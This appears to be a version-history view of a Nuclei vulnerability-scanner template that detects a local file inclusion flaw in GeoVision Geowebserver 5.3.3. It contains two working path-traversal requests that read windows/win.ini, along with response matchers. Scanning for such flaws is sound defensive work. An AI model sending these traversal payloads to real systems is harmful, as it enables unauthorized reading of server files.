nuclei-templates/vulnerabilities/other/geovision-geowebserver-lfi....

30 lines
900 B
YAML
Raw Normal View History

2021-08-17 22:20:45 +00:00
id: geowebserver-lfi
info:
name: GeoVision Geowebserver 5.3.3 - LFI
author: madrobot
severity: high
reference: https://www.exploit-db.com/exploits/50211
tags: geowebserver,lfi
requests:
- method: GET
path:
2021-08-17 22:24:30 +00:00
- "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini"
2021-08-17 22:20:45 +00:00
- "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"
matchers-condition: and
matchers:
2021-08-18 10:48:12 +00:00
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
2021-08-17 22:20:45 +00:00
part: body
- type: status
status:
- 200